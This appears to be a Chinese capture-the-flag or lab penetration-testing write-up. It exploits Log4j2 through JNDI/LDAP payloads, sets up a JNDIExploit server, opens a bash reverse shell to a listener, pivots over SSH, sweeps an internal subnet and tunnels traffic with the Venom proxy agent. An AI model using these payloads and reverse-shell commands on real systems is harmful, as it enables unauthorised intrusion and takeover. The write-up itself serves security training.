外网打点首先对web进行端口扫描,发现38080端口和22端口
文章插图
访问一下38080端口发现是一个error page
文章插图
用WAppalyzer看一下是什么架构,但是好像没有检测出来
文章插图
拿着报错去百度上发现应该是springboot
文章插图
索性用goby再去扫一下,应该是spring没错,但是没有漏洞是什么操作?联想到最近出的log4j2的洞,可能他只是一个日志文件所以并没有框架
文章插图
文章插图
使用payload=${
jndi:ldap://p9j8l8.DNSlog.cn}验证一下有回显证明存在漏洞
文章插图
尝试进一步利用漏洞,首先起一个ldap服务,ip为本地接收shell的ip地址
JAVA -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.1.105
文章插图
抓包修改Content-Type:
appllication/x-www-form-urlencoded,并执行以下payload成功回显
payload=${jndi:ldap://192.168.1.105:1389/TomcatBypass/TomcatEcho}
文章插图
执行ls -al /看一下也成功
文章插图
nc开启监听端口
文章插图
然后使用bash命令反弹,这里需要先base64编码然后对编码后的特殊字符进行2层url转码
bash -i >& /dev/tcp/192.168.1.105/9999 0>&1抓包添加payload=${jndi:ldap:1/192.168.199.140:1389/TomcatBypass/Command/Base64/二层转码之后的字符},即可得到反弹shell
文章插图
进行信息搜集发现为Docker环境,这里尝试了docker逃逸失败,那么继续进行信息搜集
文章插图
在根目录下找到了第一个flag,这里有一个got this,在之前端口扫描的时候看到开放了22端口,尝试使用ssh直接连接
文章插图
使用xshell尝试连接
文章插图
连接成功,拿到了宿主机的权限
文章插图
内网渗透ifconfig查看网卡情况发现还有一张10.0.1.0/24段的网卡
文章插图
这里方便的话其实可以使用cs上线linux后用cs继续打,这里我就没有上线cs,使用linux的命令对10.0.1.0/24段探测存货主机
for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done
文章插图
ping一下是存活的
文章插图
使用毒液把流量代理出来,首先开启监听
admin.exe -lport 7777
文章插图
然后上传agent_linux到靶机上
文章插图
加权并执行
chmod 777 agent_linux_x86agent_linux_x86 -rhost 192.168.1.105 -rport 7777
文章插图
连接成功
文章插图
这里本来准备用毒液的代理到msf打的,后面觉得比较麻烦,就直接用kali生成的elf马上线msf了
推荐阅读
- 第一次见面应该送什么礼物
- 比亚迪几年换一次电池?
- 新生儿一个小时醒一次
- 一次关于架构的“嘴炮”
- 羊水少多久复查一次
- 霸王别姬歌分享推荐
- 百度网站SEO优化关键词排名技巧分享
- 芝奇|芝奇发布超低延迟64GB DDR5内存:CL28世界第一次
- 固态硬盘|10年质保 日本推出超耐用的SSD硬盘:一辈子只能写入一次
- 1600万像素USB摄像头拍照颜色不对怎么办?一次白平衡解决偏色